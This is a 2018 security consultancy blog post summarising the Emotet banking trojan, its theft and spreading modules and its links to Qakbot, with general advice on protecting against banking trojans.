sales@siconsult.com

Phone: +44 (0)20 332 70699

Visit Si Engineering

SiConsult Location SiConsult Location SiConsult Location

The Latest Cyber
Intelligence
from Si

Si Cyber Intel:  Emotet – The Rise Of Banking Trojans
Aug2018

Si Cyber Intel: Emotet – The Rise Of Banking Trojans

Back in June, Symantec uncovered activities being undertaken by the threat group known as Mealybug. The group, first identified in 2014, built and executed malware named 'Emotet' to spread banking Trojans that would steal online banking information from users based in Europe. Once on the network, Emotet has the capability to self-propagate allowing it to spread aggressively.

Since then Mealybug's threat activities have evolved somewhat, from maintaining and delivering its own banking trojan to offering their custom-built banking trojan to similar threat actors, benefiting by taking a cut from their earnings. Delivered via phishing emails, threat actors are able to steal private information and download other payloads from the command-and-control server to then execute them.

The most recent version of the banking trojan, Emotet, has new modules added in the form of an email client module which allows the trojan to steal email credentials, banking modules that steal the user’s banking information, a browsing history and password infosteal module, PST infosteal module allowing the trojan to read through private message archives on Microsoft Outlook in order to steal email addresses and data and finally a DDoS attack module.

Emotet also has the capability to self-propagate Qakbot malware, a sister-like banking trojan that acts and behaves like a worm by using a Windows PowerShell script to download and harvest credentials using the increasing popular Mimikatz malware.

How to protect yourself: 

The rise of banking trojans are increasing as new threats are uncovered daily. To avoid being a victim of a banking trojan, we recommend the following:

  • Enforce the Two-Factor Authentication(2FA). This two-step verification is an extra layer of security that is known as "multi factor authentication" that requires not only a password and username but also something that only you know
  • Make sure internet routers at home and in the office are updated with recent patches and security updates
  • Verify websites that you are redirected to have HTTPS enabled and are encrypted with trusted certificates
  • Avoid installing mobile applications from unknown sources. By default, Google prevents users from installing apps from sources other than the Play Store. We recommend that you leave the installation of apps from unknown sources disabled
  • Avoid opening links received by SMS messages, WhatsApp or other applications from unknown sources
  • Avoid downloading third-party applications or responding to suspicious messages

For information about Si Cyber’s malware detection and response capabilities, please contact sales@siconsult.com 

 

All News

Register and stay up to date with Si’s Cyber Intelligence

By using this form you agree with the storage and handling of your data by this website.

Interested in our services?

Do you have a question or need more information?

We would like to hear from you! Please complete the form below and a representative from Si will follow up with you as soon as possible.

By using this form you agree with the storage and handling of your data by this website. Please view the terms of our policy here.
Close

Al Barsha Business Point, Office 501, Al Barsha One, P.O. Box 283996, Dubai, UAE

CALL OFFICE EMAIL OFFICE
Close

1st Floor, 6 Bevis Marks, London, EC3A 7BA

CALL OFFICE EMAIL OFFICE
Close

Supreme Headquarters Building, Office 807-810, Survey No. 36, Pune-Bangalore Highway, Baner, Pune 411045, India

CALL OFFICE EMAIL OFFICE
Close

Office 808, Tower II, The Gate Mall, West Bay, Doha, Qatar, PO Box 14023

CALL OFFICE EMAIL OFFICE

Thank you for your enquiry. We will be in touch shortly.

Thank you for signing up to Si news.

Thank you for your download request. We will email it shortly.

Thank you for your partner registration application. We will be in touch shortly.

Thank you for your enquiry. We will be in touch shortly.

Thank you for your download request. We will email it shortly.

Thank you – your request has been submitted and you will be contacted within 24 hours.

Thank you – your request has been submitted and you will be contacted within 24 hours.

Thank you – your interest in this event has been submitted and you will be contacted within 24 hours.